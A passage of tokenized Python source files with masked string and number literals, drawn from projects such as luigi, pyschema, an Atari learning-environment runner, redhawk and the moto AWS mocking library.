TypeError , flatten , ( len ( i ) for i in [ "<STR_LIT:foo>" , "<STR_LIT>" , None ] ) ) <EOL> def test_externalized_task_picklable ( self ) : <EOL> task = luigi . task . externalize ( luigi . Task ( ) ) <EOL> pickled_task = pickle . dumps ( task ) <EOL> self . assertEqual ( task , pickle . loads ( pickled_task ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import warnings <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> DeprecationWarning , <EOL> stacklevel = <NUM_LIT:2> <EOL> ) <EOL> import pyschema_extensions . luigi <EOL> from pyschema_extensions . luigi import * </s>
<s> from unittest import TestCase <EOL> from pyschema import Record , dumps , loads , ispyschema , no_auto_store <EOL> from pyschema . types import * <EOL> import pyschema . core <EOL> class RevertDefinitionsTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . _original_schemas = pyschema . core . auto_store <EOL> pyschema . core . auto_store = self . _original_schemas . clone ( ) <EOL> def tearDown ( self ) : <EOL> pyschema . core . auto_store = self . _original_schemas <EOL> class TestNestedRecord ( RevertDefinitionsTest ) : <EOL> def test_full_circle ( self ) : <EOL> class Foo ( Record ) : <EOL> bin = Bytes ( ) <EOL> class MyRecord ( Record ) : <EOL> a_string = Text ( ) <EOL> a_float = Float ( ) <EOL> record = List ( SubRecord ( Foo ) ) <EOL> rec = MyRecord ( a_string = u"<STR_LIT>" ) <EOL> rec . record = [ Foo ( bin = "<STR_LIT:bar>" ) ] <EOL> s = dumps ( rec ) <EOL> reloaded_obj = loads ( s ) <EOL> self . assertEquals ( reloaded_obj . a_string , u"<STR_LIT>" ) <EOL> self . assertTrue ( reloaded_obj . a_float is None ) <EOL> self . assertTrue ( reloaded_obj . record [ <NUM_LIT:0> ] . bin , "<STR_LIT:bar>" ) <EOL> class TestBaseRecordNotInStore ( TestCase ) : <EOL> def test ( self ) : <EOL> self . assertTrue ( Record not in pyschema . core . auto_store ) <EOL> class TestBasicUsage ( TestCase ) : <EOL> def setUp ( self ) : <EOL> @ no_auto_store ( ) <EOL> class Foo ( Record ) : <EOL> t = Text ( ) <EOL> i = Integer ( ) <EOL> b = Boolean ( ) <EOL> def calculated ( self ) : <EOL> return self . t * <NUM_LIT:2> <EOL> self . Foo = Foo <EOL> def test_class_field ( self ) : <EOL> record = self . Foo ( t = u"<STR_LIT:foo>" ) <EOL> self . assertEquals ( record . t , u"<STR_LIT:foo>" ) <EOL> def test_post_declaration_field ( self ) : <EOL> record = self . Foo ( i = <NUM_LIT:10> ) <EOL> self . assertEquals ( record . i , <NUM_LIT:10> ) <EOL> def test_setattr_field ( self ) : <EOL> record = self . Foo ( ) <EOL> self . assertTrue ( record . b is None ) <EOL> record . 
b = False <EOL> self . assertFalse ( record . b ) <EOL> def test_forbidden_assignment ( self ) : <EOL> record = self . Foo ( ) <EOL> def forbidden_assignment ( ) : <EOL> record . c = "<STR_LIT>" <EOL> self . assertRaises ( <EOL> AttributeError , <EOL> forbidden_assignment <EOL> ) <EOL> def test_record_name ( self ) : <EOL> self . assertEquals ( <EOL> self . Foo . _schema_name , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_type_adherence ( self ) : <EOL> self . assertTrue ( ispyschema ( self . Foo ) ) <EOL> self . assertTrue ( issubclass ( self . Foo , Record ) ) <EOL> self . assertTrue ( isinstance ( self . Foo , pyschema . core . PySchema ) ) <EOL> def test_method ( self ) : <EOL> record = self . Foo ( t = u"<STR_LIT:a>" ) <EOL> calc = record . calculated ( ) <EOL> self . assertEquals ( calc , u"<STR_LIT>" ) <EOL> class TestRuntimeRecord ( TestBasicUsage ) : <EOL> def setUp ( self ) : <EOL> class Foo ( object ) : <EOL> t = Text ( ) <EOL> def calculated ( self ) : <EOL> return self . t * <NUM_LIT:2> <EOL> Foo . i = Integer ( ) <EOL> setattr ( Foo , "<STR_LIT:b>" , Boolean ( ) ) <EOL> self . Foo = pyschema . core . PySchema . from_class ( Foo , auto_store = False ) </s>
<s> def deserialize ( d , ** kw ) : <EOL> vert_section , edge_section = d . split ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> verts = [ line . split ( None , <NUM_LIT:1> ) for line in vert_section . split ( '<STR_LIT:\n>' ) if line ] <EOL> counts = { } <EOL> edges = [ ] <EOL> for line in edge_section . split ( '<STR_LIT:\n>' ) : <EOL> if line : <EOL> fm , to , label = ( line . split ( None , <NUM_LIT:2> ) + [ '<STR_LIT>' ] ) [ : <NUM_LIT:3> ] <EOL> c = counts . get ( label , <NUM_LIT:0> ) <EOL> counts [ label ] = c + <NUM_LIT:1> <EOL> id = "<STR_LIT>" % ( label , c ) if c else label <EOL> edges . append ( ( id , label , fm , to ) ) <EOL> return verts , edges </s>
<s> VERSION = "<STR_LIT>" <EOL> def version ( ) : <EOL> return VERSION </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import numpy as np <EOL> import cv2 <EOL> CROP_OFFSET = <NUM_LIT:8> <EOL> class ALEExperiment ( object ) : <EOL> def __init__ ( self , ale , agent , resized_width , resized_height , <EOL> resize_method , num_epochs , epoch_length , test_length , <EOL> frame_skip , death_ends_episode , max_start_nullops , rng ) : <EOL> self . ale = ale <EOL> self . agent = agent <EOL> self . num_epochs = num_epochs <EOL> self . epoch_length = epoch_length <EOL> self . test_length = test_length <EOL> self . frame_skip = frame_skip <EOL> self . death_ends_episode = death_ends_episode <EOL> self . min_action_set = ale . getMinimalActionSet ( ) <EOL> self . resized_width = resized_width <EOL> self . resized_height = resized_height <EOL> self . resize_method = resize_method <EOL> self . width , self . height = ale . getScreenDims ( ) <EOL> self . buffer_length = <NUM_LIT:2> <EOL> self . buffer_count = <NUM_LIT:0> <EOL> self . screen_buffer = np . empty ( ( self . buffer_length , <EOL> self . height , self . width ) , <EOL> dtype = np . uint8 ) <EOL> self . terminal_lol = False <EOL> self . max_start_nullops = max_start_nullops <EOL> self . rng = rng <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> for epoch in range ( <NUM_LIT:1> , self . num_epochs + <NUM_LIT:1> ) : <EOL> self . run_epoch ( epoch , self . epoch_length ) <EOL> self . agent . finish_epoch ( epoch ) <EOL> if self . test_length > <NUM_LIT:0> : <EOL> self . agent . start_testing ( ) <EOL> self . run_epoch ( epoch , self . test_length , True ) <EOL> self . agent . finish_testing ( epoch ) <EOL> def run_epoch ( self , epoch , num_steps , testing = False ) : <EOL> """<STR_LIT>""" <EOL> self . terminal_lol = False <EOL> steps_left = num_steps <EOL> while steps_left > <NUM_LIT:0> : <EOL> prefix = "<STR_LIT>" if testing else "<STR_LIT>" <EOL> logging . info ( prefix + "<STR_LIT>" + str ( epoch ) + "<STR_LIT>" + <EOL> str ( steps_left ) ) <EOL> _ , num_steps = self . 
run_episode ( steps_left , testing ) <EOL> steps_left -= num_steps <EOL> def _init_episode ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . terminal_lol or self . ale . game_over ( ) : <EOL> self . ale . reset_game ( ) <EOL> if self . max_start_nullops > <NUM_LIT:0> : <EOL> random_actions = self . rng . randint ( <NUM_LIT:0> , self . max_start_nullops + <NUM_LIT:1> ) <EOL> for _ in range ( random_actions ) : <EOL> self . _act ( <NUM_LIT:0> ) <EOL> self . _act ( <NUM_LIT:0> ) <EOL> self . _act ( <NUM_LIT:0> ) <EOL> def _act ( self , action ) : <EOL> """<STR_LIT>""" <EOL> reward = self . ale . act ( action ) <EOL> index = self . buffer_count % self . buffer_length <EOL> self . ale . getScreenGrayscale ( self . screen_buffer [ index , ... ] ) <EOL> self . buffer_count += <NUM_LIT:1> <EOL> return reward <EOL> def _step ( self , action ) : <EOL> """<STR_LIT>""" <EOL> reward = <NUM_LIT:0> <EOL> for _ in range ( self . frame_skip ) : <EOL> reward += self . _act ( action ) <EOL> return reward <EOL> def run_episode ( self , max_steps , testing ) : <EOL> """<STR_LIT>""" <EOL> self . _init_episode ( ) <EOL> start_lives = self . ale . lives ( ) <EOL> action = self . agent . start_episode ( self . get_observation ( ) ) <EOL> num_steps = <NUM_LIT:0> <EOL> while True : <EOL> reward = self . _step ( self . min_action_set [ action ] ) <EOL> self . terminal_lol = ( self . death_ends_episode and not testing and <EOL> self . ale . lives ( ) < start_lives ) <EOL> terminal = self . ale . game_over ( ) or self . terminal_lol <EOL> num_steps += <NUM_LIT:1> <EOL> if terminal or num_steps >= max_steps : <EOL> self . agent . end_episode ( reward , terminal ) <EOL> break <EOL> action = self . agent . step ( reward , self . get_observation ( ) ) <EOL> return terminal , num_steps <EOL> def get_observation ( self ) : <EOL> """<STR_LIT>""" <EOL> assert self . buffer_count >= <NUM_LIT:2> <EOL> index = self . buffer_count % self . buffer_length - <NUM_LIT:1> <EOL> max_image = np . 
maximum ( self . screen_buffer [ index , ... ] , <EOL> self . screen_buffer [ index - <NUM_LIT:1> , ... ] ) <EOL> return self . resize_image ( max_image ) <EOL> def resize_image ( self , image ) : <EOL> """<STR_LIT>""" <EOL> if self . resize_method == '<STR_LIT>' : <EOL> resize_height = int ( round ( <EOL> float ( self . height ) * self . resized_width / self . width ) ) <EOL> resized = cv2 . resize ( image , <EOL> ( self . resized_width , resize_height ) , <EOL> interpolation = cv2 . INTER_LINEAR ) <EOL> crop_y_cutoff = resize_height - CROP_OFFSET - self . resized_height <EOL> cropped = resized [ crop_y_cutoff : <EOL> crop_y_cutoff + self . resized_height , : ] <EOL> return cropped <EOL> elif self . resize_method == '<STR_LIT>' : <EOL> return cv2 . resize ( image , <EOL> ( self . resized_width , self . resized_height ) , <EOL> interpolation = cv2 . INTER_LINEAR ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) </s>
<s> from __future__ import absolute_import <EOL> from __future__ import print_function <EOL> from . import node as N <EOL> from . import node_position as NP <EOL> import redhawk . utils . util as U <EOL> class TreeConverter : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filename = None ) : <EOL> self . filename = filename <EOL> return <EOL> def ThrowNotImplementedError ( self , tree ) : <EOL> raise NotImplementedError ( "<STR_LIT>" % ( tree . __class__ . __name__ . capitalize ( ) ) ) <EOL> def AttachParents ( self , tree , parent = None ) : <EOL> """<STR_LIT>""" <EOL> tree . SetParent ( parent ) <EOL> for c in tree . GetFlattenedChildren ( ) : <EOL> if c is not None : <EOL> try : <EOL> self . AttachParents ( c , tree ) <EOL> except AttributeError as e : <EOL> print ( c , parent , tree ) <EOL> raise AttributeError ( e ) <EOL> return <EOL> def Convert ( self , tree ) : <EOL> """<STR_LIT>""" <EOL> if tree is None : <EOL> l_ast = N . Module ( position = NP . NodePosition ( self . filename , <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> filename = self . filename , <EOL> children = [ ] ) <EOL> else : <EOL> l_ast = self . ConvertTree ( tree ) <EOL> self . AttachParents ( l_ast ) <EOL> return l_ast <EOL> def ConvertTree ( self , tree ) : <EOL> method = "<STR_LIT>" + tree . __class__ . __name__ . capitalize ( ) <EOL> visitor = getattr ( self , method , self . ThrowNotImplementedError ) <EOL> return visitor ( tree ) <EOL> def ConvertListOfStatements ( self , statements ) : <EOL> """<STR_LIT>""" <EOL> return [ self . ConvertTree ( statement ) for statement in statements ] </s>
<s> a = <NUM_LIT:2> <EOL> if a == <NUM_LIT:2> : <EOL> b = <NUM_LIT:2> <EOL> elif a == <NUM_LIT:3> : <EOL> b = <NUM_LIT:3> <EOL> else : <EOL> b = <NUM_LIT:0> </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import redhawk <EOL> try : <EOL> import anydbm <EOL> except ImportError : <EOL> import dbm as anydbm <EOL> import logging <EOL> import os <EOL> import shelve <EOL> import sys <EOL> VERSION_KEY = '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> def _OpenStore ( store_file ) : <EOL> return shelve . open ( store_file , '<STR_LIT:c>' , protocol = - <NUM_LIT:1> ) <EOL> def _CloseStoreObject ( store_object ) : <EOL> store_object . close ( ) <EOL> def CreateNewStore ( store_file , version ) : <EOL> """<STR_LIT>""" <EOL> assert ( os . path . exists ( store_file ) == False ) <EOL> store = _OpenStore ( store_file ) <EOL> store [ VERSION_KEY ] = version <EOL> _CloseStoreObject ( store ) <EOL> assert ( os . path . exists ( store_file ) == True ) <EOL> return None <EOL> def RemoveExistingStore ( store_file ) : <EOL> """<STR_LIT>""" <EOL> assert ( os . path . exists ( store_file ) == True ) <EOL> os . remove ( store_file ) <EOL> assert ( os . path . exists ( store_file ) == False ) <EOL> return None <EOL> def IsValidStore ( store_file ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> store = _OpenStore ( store_file ) <EOL> _CloseStoreObject ( store ) <EOL> except anydbm . error as e : <EOL> return False <EOL> return True <EOL> class KeyValueStore : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , store_file , version ) : <EOL> self . version = version <EOL> self . store_file = store_file <EOL> self . store = _OpenStore ( store_file ) <EOL> if ( VERSION_KEY not in self . store or <EOL> self . store [ VERSION_KEY ] != version ) : <EOL> logging . error ( "<STR_LIT>" ) <EOL> self . ClearStore ( ) <EOL> return <EOL> def ClearStore ( self ) : <EOL> _CloseStoreObject ( self . store ) <EOL> RemoveExistingStore ( self . store_file ) <EOL> CreateNewStore ( self . store_file , redhawk . GetVersion ( ) ) <EOL> self . store = shelve . open ( self . store_file ) <EOL> return <EOL> def Close ( self ) : <EOL> _CloseStoreObject ( self . 
store ) <EOL> def Write ( self ) : <EOL> _CloseStoreObject ( self . store ) <EOL> self . store = _OpenStore ( self . store_file ) <EOL> def GetVersion ( self ) : <EOL> return self . store [ VERSION_KEY ] <EOL> def HasKey ( self , key ) : <EOL> return key in self . store <EOL> def Get ( self , key ) : <EOL> assert ( key != VERSION_KEY ) <EOL> return self . store [ key ] <EOL> def Set ( self , key , value ) : <EOL> assert ( key != VERSION_KEY ) <EOL> self . store [ key ] = value <EOL> def RemoveKey ( self , key ) : <EOL> self . store . pop ( key ) <EOL> def GetKeys ( self ) : <EOL> return ( i for i in self . store . keys ( ) if i != VERSION_KEY ) </s>
<s> from adapter import * </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import time <EOL> from subprocess import call as subcall <EOL> app = '<STR_LIT>' <EOL> version = __import__ ( app ) . __version__ <EOL> def call ( cmd ) : <EOL> try : <EOL> response = subcall ( cmd , shell = True ) <EOL> print <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> if response < <NUM_LIT:0> : <EOL> sys . exit ( response ) <EOL> except OSError , E : <EOL> sys . exit ( E ) <EOL> def cleanup ( ) : <EOL> call ( '<STR_LIT>' ) <EOL> def tag ( ) : <EOL> call ( '<STR_LIT>' % ( version , version ) ) <EOL> def upload ( ) : <EOL> call ( '<STR_LIT>' ) <EOL> def main ( ) : <EOL> cleanup ( ) <EOL> tag ( ) <EOL> upload ( ) <EOL> cleanup ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import sys <EOL> from setuptools import setup <EOL> requires = [ '<STR_LIT>' ] <EOL> if sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> : <EOL> requires += [ '<STR_LIT>' ] <EOL> else : <EOL> requires += [ '<STR_LIT>' ] <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> install_requires = requires , <EOL> include_package_data = True , <EOL> license = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from . models import cloudformation_backends <EOL> from . . core . models import MockAWS <EOL> cloudformation_backend = cloudformation_backends [ '<STR_LIT>' ] <EOL> def mock_cloudformation ( func = None ) : <EOL> if func : <EOL> return MockAWS ( cloudformation_backends ) ( func ) <EOL> else : <EOL> return MockAWS ( cloudformation_backends ) </s>
<s> from __future__ import unicode_literals <EOL> from . models import dynamodb_backend2 <EOL> mock_dynamodb2 = dynamodb_backend2 . decorator </s>
<s> from __future__ import unicode_literals <EOL> from moto . core . responses import BaseResponse <EOL> from moto . ec2 . utils import filters_from_querystring <EOL> class SpotInstances ( BaseResponse ) : <EOL> def cancel_spot_instance_requests ( self ) : <EOL> request_ids = self . _get_multi_param ( '<STR_LIT>' ) <EOL> requests = self . ec2_backend . cancel_spot_instance_requests ( request_ids ) <EOL> template = self . response_template ( CANCEL_SPOT_INSTANCES_TEMPLATE ) <EOL> return template . render ( requests = requests ) <EOL> def create_spot_datafeed_subscription ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def delete_spot_datafeed_subscription ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def describe_spot_datafeed_subscription ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def describe_spot_instance_requests ( self ) : <EOL> filters = filters_from_querystring ( self . querystring ) <EOL> requests = self . ec2_backend . describe_spot_instance_requests ( filters = filters ) <EOL> template = self . response_template ( DESCRIBE_SPOT_INSTANCES_TEMPLATE ) <EOL> return template . render ( requests = requests ) <EOL> def describe_spot_price_history ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def request_spot_instances ( self ) : <EOL> price = self . _get_param ( '<STR_LIT>' ) <EOL> image_id = self . _get_param ( '<STR_LIT>' ) <EOL> count = self . _get_int_param ( '<STR_LIT>' ) <EOL> type = self . _get_param ( '<STR_LIT>' ) <EOL> valid_from = self . _get_param ( '<STR_LIT>' ) <EOL> valid_until = self . _get_param ( '<STR_LIT>' ) <EOL> launch_group = self . _get_param ( '<STR_LIT>' ) <EOL> availability_zone_group = self . _get_param ( '<STR_LIT>' ) <EOL> key_name = self . _get_param ( '<STR_LIT>' ) <EOL> security_groups = self . _get_multi_param ( '<STR_LIT>' ) <EOL> user_data = self . _get_param ( '<STR_LIT>' ) <EOL> instance_type = self . 
_get_param ( '<STR_LIT>' ) <EOL> placement = self . _get_param ( '<STR_LIT>' ) <EOL> kernel_id = self . _get_param ( '<STR_LIT>' ) <EOL> ramdisk_id = self . _get_param ( '<STR_LIT>' ) <EOL> monitoring_enabled = self . _get_param ( '<STR_LIT>' ) <EOL> subnet_id = self . _get_param ( '<STR_LIT>' ) <EOL> requests = self . ec2_backend . request_spot_instances ( <EOL> price = price , <EOL> image_id = image_id , <EOL> count = count , <EOL> type = type , <EOL> valid_from = valid_from , <EOL> valid_until = valid_until , <EOL> launch_group = launch_group , <EOL> availability_zone_group = availability_zone_group , <EOL> key_name = key_name , <EOL> security_groups = security_groups , <EOL> user_data = user_data , <EOL> instance_type = instance_type , <EOL> placement = placement , <EOL> kernel_id = kernel_id , <EOL> ramdisk_id = ramdisk_id , <EOL> monitoring_enabled = monitoring_enabled , <EOL> subnet_id = subnet_id , <EOL> ) <EOL> template = self . response_template ( REQUEST_SPOT_INSTANCES_TEMPLATE ) <EOL> return template . render ( requests = requests ) <EOL> REQUEST_SPOT_INSTANCES_TEMPLATE = """<STR_LIT>""" <EOL> DESCRIBE_SPOT_INSTANCES_TEMPLATE = """<STR_LIT>""" <EOL> CANCEL_SPOT_INSTANCES_TEMPLATE = """<STR_LIT>""" </s>
<s> from __future__ import unicode_literals <EOL> import hashlib <EOL> import boto . glacier <EOL> from moto . core import BaseBackend <EOL> from . utils import get_job_id <EOL> class ArchiveJob ( object ) : <EOL> def __init__ ( self , job_id , archive_id ) : <EOL> self . job_id = job_id <EOL> self . archive_id = archive_id <EOL> def to_dict ( self ) : <EOL> return { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : self . archive_id , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:0>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : self . job_id , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> } <EOL> class Vault ( object ) : <EOL> def __init__ ( self , vault_name , region ) : <EOL> self . vault_name = vault_name <EOL> self . region = region <EOL> self . archives = { } <EOL> self . jobs = { } <EOL> @ property <EOL> def arn ( self ) : <EOL> return "<STR_LIT>" . format ( self . region , self . vault_name ) <EOL> def to_dict ( self ) : <EOL> return { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : self . arn , <EOL> "<STR_LIT>" : self . vault_name , <EOL> } <EOL> def create_archive ( self , body ) : <EOL> archive_id = hashlib . sha256 ( body ) . hexdigest ( ) <EOL> self . archives [ archive_id ] = body <EOL> return archive_id <EOL> def get_archive_body ( self , archive_id ) : <EOL> return self . archives [ archive_id ] <EOL> def delete_archive ( self , archive_id ) : <EOL> return self . archives . pop ( archive_id ) <EOL> def initiate_job ( self , archive_id ) : <EOL> job_id = get_job_id ( ) <EOL> job = ArchiveJob ( job_id , archive_id ) <EOL> self . 
jobs [ job_id ] = job <EOL> return job_id <EOL> def list_jobs ( self ) : <EOL> return self . jobs . values ( ) <EOL> def describe_job ( self , job_id ) : <EOL> return self . jobs . get ( job_id ) <EOL> def get_job_output ( self , job_id ) : <EOL> job = self . describe_job ( job_id ) <EOL> archive_body = self . get_archive_body ( job . archive_id ) <EOL> return archive_body <EOL> class GlacierBackend ( BaseBackend ) : <EOL> def __init__ ( self , region_name ) : <EOL> self . vaults = { } <EOL> self . region_name = region_name <EOL> def reset ( self ) : <EOL> region_name = self . region_name <EOL> self . __dict__ = { } <EOL> self . __init__ ( region_name ) <EOL> def get_vault ( self , vault_name ) : <EOL> return self . vaults [ vault_name ] <EOL> def create_vault ( self , vault_name ) : <EOL> self . vaults [ vault_name ] = Vault ( vault_name , self . region_name ) <EOL> def list_vaules ( self ) : <EOL> return self . vaults . values ( ) <EOL> def delete_vault ( self , vault_name ) : <EOL> self . vaults . pop ( vault_name ) <EOL> def initiate_job ( self , vault_name , archive_id ) : <EOL> vault = self . get_vault ( vault_name ) <EOL> job_id = vault . initiate_job ( archive_id ) <EOL> return job_id <EOL> def list_jobs ( self , vault_name ) : <EOL> vault = self . get_vault ( vault_name ) <EOL> return vault . list_jobs ( ) <EOL> glacier_backends = { } <EOL> for region in boto . glacier . regions ( ) : <EOL> glacier_backends [ region . name ] = GlacierBackend ( region ) </s>
<s> from __future__ import unicode_literals <EOL> import json <EOL> from werkzeug . exceptions import BadRequest <EOL> class RDSClientError ( BadRequest ) : <EOL> def __init__ ( self , code , message ) : <EOL> super ( RDSClientError , self ) . __init__ ( ) <EOL> self . description = json . dumps ( { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : code , <EOL> "<STR_LIT>" : message , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> class DBInstanceNotFoundError ( RDSClientError ) : <EOL> def __init__ ( self , database_identifier ) : <EOL> super ( DBInstanceNotFoundError , self ) . __init__ ( <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" . format ( database_identifier ) ) <EOL> class DBSecurityGroupNotFoundError ( RDSClientError ) : <EOL> def __init__ ( self , security_group_name ) : <EOL> super ( DBSecurityGroupNotFoundError , self ) . __init__ ( <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" . format ( security_group_name ) ) <EOL> class DBSubnetGroupNotFoundError ( RDSClientError ) : <EOL> def __init__ ( self , subnet_group_name ) : <EOL> super ( DBSubnetGroupNotFoundError , self ) . __init__ ( <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" . format ( subnet_group_name ) ) </s>
<s> from __future__ import unicode_literals <EOL> from moto . core . exceptions import RESTError <EOL> class MessageRejectedError ( RESTError ) : <EOL> code = <NUM_LIT> <EOL> def __init__ ( self , message ) : <EOL> super ( MessageRejectedError , self ) . __init__ ( <EOL> "<STR_LIT>" , message ) </s>
<s> from __future__ import unicode_literals <EOL> from datetime import datetime <EOL> import uuid <EOL> from moto . core . utils import unix_time <EOL> from . . exceptions import SWFWorkflowExecutionClosedError <EOL> from . timeout import Timeout <EOL> class DecisionTask ( object ) : <EOL> def __init__ ( self , workflow_execution , scheduled_event_id ) : <EOL> self . workflow_execution = workflow_execution <EOL> self . workflow_type = workflow_execution . workflow_type <EOL> self . task_token = str ( uuid . uuid4 ( ) ) <EOL> self . scheduled_event_id = scheduled_event_id <EOL> self . previous_started_event_id = <NUM_LIT:0> <EOL> self . started_event_id = None <EOL> self . started_timestamp = None <EOL> self . start_to_close_timeout = self . workflow_execution . task_start_to_close_timeout <EOL> self . state = "<STR_LIT>" <EOL> self . scheduled_at = datetime . utcnow ( ) <EOL> self . timeout_type = None <EOL> @ property <EOL> def started ( self ) : <EOL> return self . state == "<STR_LIT>" <EOL> def _check_workflow_execution_open ( self ) : <EOL> if not self . workflow_execution . open : <EOL> raise SWFWorkflowExecutionClosedError ( ) <EOL> def to_full_dict ( self , reverse_order = False ) : <EOL> events = self . workflow_execution . events ( reverse_order = reverse_order ) <EOL> hsh = { <EOL> "<STR_LIT>" : [ <EOL> evt . to_dict ( ) for evt in events <EOL> ] , <EOL> "<STR_LIT>" : self . task_token , <EOL> "<STR_LIT>" : self . previous_started_event_id , <EOL> "<STR_LIT>" : self . workflow_execution . to_short_dict ( ) , <EOL> "<STR_LIT>" : self . workflow_type . to_short_dict ( ) , <EOL> } <EOL> if self . started_event_id : <EOL> hsh [ "<STR_LIT>" ] = self . started_event_id <EOL> return hsh <EOL> def start ( self , started_event_id ) : <EOL> self . state = "<STR_LIT>" <EOL> self . started_timestamp = unix_time ( ) <EOL> self . started_event_id = started_event_id <EOL> def complete ( self ) : <EOL> self . _check_workflow_execution_open ( ) <EOL> self . 
state = "<STR_LIT>" <EOL> def first_timeout ( self ) : <EOL> if not self . started or not self . workflow_execution . open : <EOL> return None <EOL> start_to_close_at = self . started_timestamp + int ( self . start_to_close_timeout ) <EOL> _timeout = Timeout ( self , start_to_close_at , "<STR_LIT>" ) <EOL> if _timeout . reached : <EOL> return _timeout <EOL> def process_timeouts ( self ) : <EOL> _timeout = self . first_timeout ( ) <EOL> if _timeout : <EOL> self . timeout ( _timeout ) <EOL> def timeout ( self , _timeout ) : <EOL> self . _check_workflow_execution_open ( ) <EOL> self . state = "<STR_LIT>" <EOL> self . timeout_type = _timeout . kind </s>
<s> from __future__ import unicode_literals <EOL> template = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } <EOL> } <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } <EOL> } <EOL> } <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> import tests . backport_assert_raises <EOL> from nose . tools import assert_raises <EOL> import boto3 <EOL> import boto <EOL> from boto . exception import EC2ResponseError <EOL> import sure <EOL> from moto import mock_ec2 <EOL> SAMPLE_DOMAIN_NAME = u'<STR_LIT>' <EOL> SAMPLE_NAME_SERVERS = [ u'<STR_LIT>' , u'<STR_LIT>' ] <EOL> @ mock_ec2 <EOL> def test_dhcp_options_associate ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp_options = conn . create_dhcp_options ( SAMPLE_DOMAIN_NAME , SAMPLE_NAME_SERVERS ) <EOL> vpc = conn . create_vpc ( "<STR_LIT>" ) <EOL> rval = conn . associate_dhcp_options ( dhcp_options . id , vpc . id ) <EOL> rval . should . be . equal ( True ) <EOL> @ mock_ec2 <EOL> def test_dhcp_options_associate_invalid_dhcp_id ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> vpc = conn . create_vpc ( "<STR_LIT>" ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . associate_dhcp_options ( "<STR_LIT:foo>" , vpc . id ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> @ mock_ec2 <EOL> def test_dhcp_options_associate_invalid_vpc_id ( ) 